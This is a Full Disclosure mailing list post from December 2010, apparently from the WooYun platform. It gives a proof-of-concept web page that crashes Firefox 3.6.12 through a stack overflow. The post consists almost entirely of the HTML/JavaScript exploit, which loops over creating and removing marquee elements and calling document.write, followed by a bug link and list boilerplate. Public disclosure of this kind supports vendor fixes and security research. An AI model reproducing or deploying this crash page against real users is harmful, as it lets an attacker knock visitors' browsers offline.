Full Disclosure mailing list archives
FireFox 3.6.12 Stack Overflow Denial of Service
From: sec yun <root () wooyun org>
Date: Wed, 8 Dec 2010 16:28:41 +0800
<code> <html> <body></body> <script type="text/javascript"> function xxoo(){ var str="marquee"; var cobj=document.createElement(str); cobj.id="bK"; document.body.appendChild(cobj); var obj=document.getElementById("bK"); var atts = new Array(); for(p in obj){ } document.body.removeChild(cobj); var html="<marquee>"; document.write(html); } for (i = 0; i < 500; i++) { xxoo(); } </script> </code> http://www.wooyun.org/bugs/wooyun-2010-0903 WooYun is a connection platform for vendors and security researchers From 0x250@wooyun :)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- FireFox 3.6.12 Stack Overflow Denial of Service sec yun (Dec 08)
- Re: FireFox 3.6.12 Stack Overflow Denial of Service Berend-Jan Wever (Dec 08)